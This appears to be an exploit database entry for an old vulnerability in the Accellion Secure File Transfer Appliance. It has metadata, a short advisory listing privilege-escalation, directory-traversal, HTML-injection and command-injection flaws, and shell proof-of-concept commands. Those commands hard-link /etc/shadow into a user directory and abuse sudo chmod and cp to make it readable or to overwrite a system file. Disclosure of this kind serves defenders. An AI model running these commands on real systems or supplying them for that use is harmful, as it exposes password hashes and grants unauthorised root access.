[] NeoSense

Accellion Secure File Transfer Appliance - Multiple Command Restriction / Privilege Escalations

Author: Tim Brown
type: local
platform: linux
port: 
date_added: 2010-02-10 
date_updated: 2019-03-28 
verified: 1 
codes: CVE-2009-4648;OSVDB-62522 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/38176/info

Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including:

- Multiple privilege-escalation issues
- A directory-traversal issue
- An HTML-injection issue
- A remote command-injection issue

An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible.

The following proofs of concept are available:

sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp

sh-2.05b$ ln /etc/shadow /home/admin/temp
sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf

sh-2.05b$ sudo /usr/local/bin/admin.pl